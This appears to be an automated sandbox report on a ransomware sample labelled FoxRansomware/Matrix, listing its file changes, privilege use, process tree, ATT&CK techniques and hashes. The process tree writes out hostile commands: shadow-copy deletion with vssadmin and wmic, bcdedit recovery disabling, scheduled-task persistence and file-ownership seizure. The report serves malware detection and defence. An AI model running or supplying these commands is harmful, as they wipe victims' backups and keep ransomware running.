description ioc Process File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Taipei 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\access\libftp_plugin.dll 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-compat.jar 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\InfoPathOM\InfoPathOMFormServices\Microsoft.Office.Infopath.dll 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\Certificates\Verisign\Components\VS_ComponentSigningIntermediate.cer 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.SE.XML 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\UIAutomationTypes.dll 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\ExecutiveReport.dotx 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\access\libdvdread_plugin.dll 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\codec\libedummy_plugin.dll 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\Publisher\Backgrounds\J0143752.GIF 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SCHDRESP.CFG 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\OUTLLIBR.REST.IDX_DLL 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\mspub.exe.manifest 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes.nl_ja_4.4.0.v20140623020002.jar 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Phoenix 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD00428_.WMF 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01126_.WMF 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0187815.WMF 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\SoftBlue\tab_on.gif 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287641.JPG 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-oql.jar 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Jujuy 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files\Microsoft Games\More Games\it-IT\MoreGames.dll.mui 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Bibliography\Sort\TITLE.XSL 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OCRVC.DAT 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files\Microsoft Games\FreeCell\fr-FR\FreeCell.exe.mui 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\Sounds\Things\WHOOSH.WAV 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\PS9CRNRH.POC 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\d3dcompiler_47.dll 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-swing-tabcontrol.xml 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\luac.luac 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14565_.GIF 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\hprof-16.png 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Seoul 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.CO.IN.XML 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-keyring-fallback.xml 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Azores 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Rainy_River 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.aup 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0151581.WMF 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files\VideoLAN\VLC\plugins\mux\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\tesselate.x3d 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\BDRTKFUL.POC 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGREPFRM.XML 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309598.JPG 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Desert\TAB_ON.GIF 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Sts2.css 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Welcome Tool\IconImages.jpg 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files\Microsoft Games\Solitaire\it-IT\Solitaire.exe.mui 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Swirl\TAB_ON.GIF 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PEOPLEDATAHANDLER.DLL 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormToolImages.jpg 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\icucnv36.dll 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\ja\System.Net.Resources.dll 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0187847.WMF 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GROOVE_COL.HXT 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGWEBCAL.DPV 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0332268.WMF 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\nb\LC_MESSAGES\vlc.mo 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\keytool.exe 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\jp2native.dll 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2612 schtasks.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2740 vssadmin.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 3024 powershell.exe 1636 gbw8Tp4V64.exe 1636 gbw8Tp4V64.exe 1636 gbw8Tp4V64.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 1636 gbw8Tp4V64.exe -
Suspicious use of AdjustPrivilegeToken 46 IoCs
description pid Process Token: SeDebugPrivilege 3024 powershell.exe Token: SeDebugPrivilege 1636 gbw8Tp4V64.exe Token: SeLoadDriverPrivilege 1636 gbw8Tp4V64.exe Token: SeBackupPrivilege 2760 vssvc.exe Token: SeRestorePrivilege 2760 vssvc.exe Token: SeAuditPrivilege 2760 vssvc.exe Token: SeIncreaseQuotaPrivilege 3812 WMIC.exe Token: SeSecurityPrivilege 3812 WMIC.exe Token: SeTakeOwnershipPrivilege 3812 WMIC.exe Token: SeLoadDriverPrivilege 3812 WMIC.exe Token: SeSystemProfilePrivilege 3812 WMIC.exe Token: SeSystemtimePrivilege 3812 WMIC.exe Token: SeProfSingleProcessPrivilege 3812 WMIC.exe Token: SeIncBasePriorityPrivilege 3812 WMIC.exe Token: SeCreatePagefilePrivilege 3812 WMIC.exe Token: SeBackupPrivilege 3812 WMIC.exe Token: SeRestorePrivilege 3812 WMIC.exe Token: SeShutdownPrivilege 3812 WMIC.exe Token: SeDebugPrivilege 3812 WMIC.exe Token: SeSystemEnvironmentPrivilege 3812 WMIC.exe Token: SeRemoteShutdownPrivilege 3812 WMIC.exe Token: SeUndockPrivilege 3812 WMIC.exe Token: SeManageVolumePrivilege 3812 WMIC.exe Token: 33 3812 WMIC.exe Token: 34 3812 WMIC.exe Token: 35 3812 WMIC.exe Token: SeIncreaseQuotaPrivilege 3812 WMIC.exe Token: SeSecurityPrivilege 3812 WMIC.exe Token: SeTakeOwnershipPrivilege 3812 WMIC.exe Token: SeLoadDriverPrivilege 3812 WMIC.exe Token: SeSystemProfilePrivilege 3812 WMIC.exe Token: SeSystemtimePrivilege 3812 WMIC.exe Token: SeProfSingleProcessPrivilege 3812 WMIC.exe Token: SeIncBasePriorityPrivilege 3812 WMIC.exe Token: SeCreatePagefilePrivilege 3812 WMIC.exe Token: SeBackupPrivilege 3812 WMIC.exe Token: SeRestorePrivilege 3812 WMIC.exe Token: SeShutdownPrivilege 3812 WMIC.exe Token: SeDebugPrivilege 3812 WMIC.exe Token: SeSystemEnvironmentPrivilege 3812 WMIC.exe Token: SeRemoteShutdownPrivilege 3812 WMIC.exe Token: SeUndockPrivilege 3812 WMIC.exe Token: SeManageVolumePrivilege 3812 WMIC.exe Token: 33 3812 WMIC.exe Token: 34 3812 WMIC.exe Token: 35 3812 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1648 wrote to memory of 2404 1648 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe 29 PID 1648 wrote to memory of 2404 1648 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe 29 PID 1648 wrote to memory of 2404 1648 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe 29 PID 1648 wrote to memory of 2404 1648 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe 29 PID 1648 wrote to memory of 2700 1648 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe 31 PID 1648 wrote to memory of 2700 1648 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe 31 PID 1648 wrote to memory of 2700 1648 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe 31 PID 1648 wrote to memory of 2700 1648 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe 31 PID 1648 wrote to memory of 2920 1648 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe 33 PID 1648 wrote to memory of 2920 1648 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe 33 PID 1648 wrote to memory of 2920 1648 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe 33 PID 1648 wrote to memory of 2920 1648 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe 33 PID 2920 wrote to memory of 3024 2920 cmd.exe 35 PID 2920 wrote to memory of 3024 2920 cmd.exe 35 PID 2920 wrote to memory of 3024 2920 cmd.exe 35 PID 2920 wrote to memory of 3024 2920 cmd.exe 35 PID 1648 wrote to memory of 1584 1648 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe 36 PID 1648 wrote to memory of 1584 1648 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe 36 PID 1648 wrote to memory of 1584 1648 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe 36 PID 1648 wrote to memory of 1584 1648 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe 36 PID 1648 wrote to memory of 700 1648 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe 38 PID 1648 wrote to memory of 700 1648 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe 38 PID 1648 wrote to memory of 700 1648 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe 38 PID 1648 wrote to memory of 700 1648 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe 38 PID 1584 wrote to memory of 1912 1584 cmd.exe 39 PID 1584 wrote to memory of 1912 1584 cmd.exe 39 PID 1584 wrote to memory of 1912 1584 cmd.exe 39 PID 1584 wrote to memory of 1912 1584 cmd.exe 39 PID 1584 wrote to memory of 696 1584 cmd.exe 41 PID 1584 wrote to memory of 696 1584 cmd.exe 41 PID 1584 wrote to memory of 696 1584 cmd.exe 41 PID 1584 wrote to memory of 696 1584 cmd.exe 41 PID 1584 wrote to memory of 548 1584 cmd.exe 43 PID 1584 wrote to memory of 548 1584 cmd.exe 43 PID 1584 wrote to memory of 548 1584 cmd.exe 43 PID 1584 wrote to memory of 548 1584 cmd.exe 43 PID 700 wrote to memory of 1108 700 cmd.exe 42 PID 700 wrote to memory of 1108 700 cmd.exe 42 PID 700 wrote to memory of 1108 700 cmd.exe 42 PID 700 wrote to memory of 1108 700 cmd.exe 42 PID 1648 wrote to memory of 1704 1648 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe 44 PID 1648 wrote to memory of 1704 1648 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe 44 PID 1648 wrote to memory of 1704 1648 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe 44 PID 1648 wrote to memory of 1704 1648 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe 44 PID 1108 wrote to memory of 1768 1108 wscript.exe 46 PID 1108 wrote to memory of 1768 1108 wscript.exe 46 PID 1108 wrote to memory of 1768 1108 wscript.exe 46 PID 1108 wrote to memory of 1768 1108 wscript.exe 46 PID 1704 wrote to memory of 2588 1704 cmd.exe 49 PID 1704 wrote to memory of 2588 1704 cmd.exe 49 PID 1704 wrote to memory of 2588 1704 cmd.exe 49 PID 1704 wrote to memory of 2588 1704 cmd.exe 49 PID 1768 wrote to memory of 2612 1768 cmd.exe 48 PID 1768 wrote to memory of 2612 1768 cmd.exe 48 PID 1768 wrote to memory of 2612 1768 cmd.exe 48 PID 1768 wrote to memory of 2612 1768 cmd.exe 48 PID 1704 wrote to memory of 2088 1704 cmd.exe 50 PID 1704 wrote to memory of 2088 1704 cmd.exe 50 PID 1704 wrote to memory of 2088 1704 cmd.exe 50 PID 1704 wrote to memory of 2088 1704 cmd.exe 50 PID 1704 wrote to memory of 2552 1704 cmd.exe 51 PID 1704 wrote to memory of 2552 1704 cmd.exe 51 PID 1704 wrote to memory of 2552 1704 cmd.exe 51 PID 1704 wrote to memory of 2552 1704 cmd.exe 51 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 2588 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe"1⤵
- Matrix Ransomware
- Loads dropped DLL
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1648 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe" "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWKkLa9n.exe"2⤵PID:2404
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWKkLa9n.exe"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWKkLa9n.exe" -n2⤵
- Executes dropped EXE
PID:2700
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XrqahlQb.txt"2⤵
- Suspicious use of WriteProcessMemory
PID:2920 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3024
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\OsRNBNcX.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1584 -
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\OsRNBNcX.bmp" /f3⤵
- Sets desktop wallpaper using registry
PID:1912
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f3⤵PID:696
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f3⤵PID:548
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\EQHMlr5B.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:700 -
C:\Windows\SysWOW64\wscript.exewscript //B //Nologo "C:\Users\Admin\AppData\Roaming\EQHMlr5B.vbs"3⤵
- Suspicious use of WriteProcessMemory
PID:1108 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\AAgZ7an1.bat" /sc minute /mo 5 /RL HIGHEST /F4⤵
- Suspicious use of WriteProcessMemory
PID:1768 -
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\AAgZ7an1.bat" /sc minute /mo 5 /RL HIGHEST /F5⤵
- Creates scheduled task(s)
PID:2612
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA4⤵PID:2396
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /I /tn DSHCA5⤵PID:2680
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\F4W1lmNX.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf""2⤵
- Suspicious use of WriteProcessMemory
PID:1704 -
C:\Windows\SysWOW64\attrib.exeattrib -R -A -S "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf"3⤵
- Views/modifies file attributes
PID:2588
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf" /E /G Admin:F /C3⤵PID:2088
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf"3⤵
- Modifies file permissions
PID:2552
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c gbw8Tp4V.exe -accepteula "SignHere.pdf" -nobanner3⤵
- Loads dropped DLL
PID:1020 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\gbw8Tp4V.exegbw8Tp4V.exe -accepteula "SignHere.pdf" -nobanner4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1192 -
C:\Users\Admin\AppData\Local\Temp\gbw8Tp4V64.exegbw8Tp4V.exe -accepteula "SignHere.pdf" -nobanner5⤵
- Drops file in Drivers directory
- Sets service image path in registry
- Executes dropped EXE
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:1636 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1636 -s 2286⤵
- Loads dropped DLL
PID:2876
-
-
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {4F3647FA-9122-40C4-94CD-2BF27217A82E} S-1-5-21-452311807-3713411997-1028535425-1000:OZEMQECW\Admin:Interactive:[1]1⤵PID:2844
-
C:\Windows\SYSTEM32\cmd.exeC:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\AAgZ7an1.bat"2⤵PID:1804
-
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /All /Quiet3⤵
- Interacts with shadow copies
PID:2740
-
-
C:\Windows\System32\Wbem\WMIC.exewmic SHADOWCOPY DELETE3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3812
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:3292
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures3⤵
- Modifies boot configuration data using bcdedit
PID:3468
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Delete /TN DSHCA /F3⤵PID:2368
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2760
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Defense Evasion
File and Directory Permissions Modification
1Hide Artifacts
1Hidden Files and Directories
1Indicator Removal
2File Deletion
2Modify Registry
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5092a0c3ba49e0edf0ee57428ea4c9d4e
SHA136773f1d399341ef5316f51a534e29337581d941
SHA256af913fb1d2b33d4f301a5cf285374ae71d4c1ae4cb37f26ee9cca53f1938e820
SHA512701239651b4f9b70700544173d4fcdcf2e35ca75b709c77e84c306e96687df47bb2f95810489d20ceb234f0b9b85799623e80f58fd6fbb43a1e3481dd48b0e73
-
Filesize
8KB
MD5780d8192b96ace15d3efce43ab816529
SHA1f5a2b684129fd1c6fd0c935a5a7277d21ae13633
SHA256217b3a7d6f00a0ab7e0eaf0e650e362d185e91a17589126d834c5993fafd5894
SHA51208d4601ea9f8e83f03f3fc3cc4ebffefff1b8e6b790684878e9ad9351ce23e86307b5388a8d5abc2c737f1c28168d51a56ec746627c24ee65a6ffcd0d21f517e
-
Filesize
246B
